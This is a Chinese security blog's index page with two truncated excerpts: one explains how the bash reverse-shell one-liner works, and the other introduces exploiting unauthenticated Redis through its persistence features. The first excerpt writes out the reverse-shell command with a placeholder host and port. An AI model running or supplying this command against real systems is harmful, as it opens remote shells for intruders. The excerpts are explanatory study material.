00theway's Blog

always on the way!

bash反弹shell原理解析

bash 反弹shell下边是一段熟悉而又陌生的代码,经常被用来在linux环境下反弹shell, 1bash -i >& /dev/tcp/host/port 0>&1 然而这段代码用了好长时间对它的原理一直是似懂非懂的,于是就抽时间研究了一下。 用到的特殊文件介绍12>/dev/tcp/host/port> 当操作上边文件时, bash 会打开一......

redis未授权访问利用

简介Redis 提供了2种不同的持久化方式,RDB方式和AOF方式. RDB 持久化可以在指定的时间间隔内生成数据集的时间点快照. AOF 持久化记录服务器执行的所有写操作命令. 经过查看官网文档发现AOF方式备份数据库的文件名默认为appendonly.aof,可以在配置文件中通过appendfilename设置其他名称,通过测试发现不能在客户端交互中动态设置appendfilena......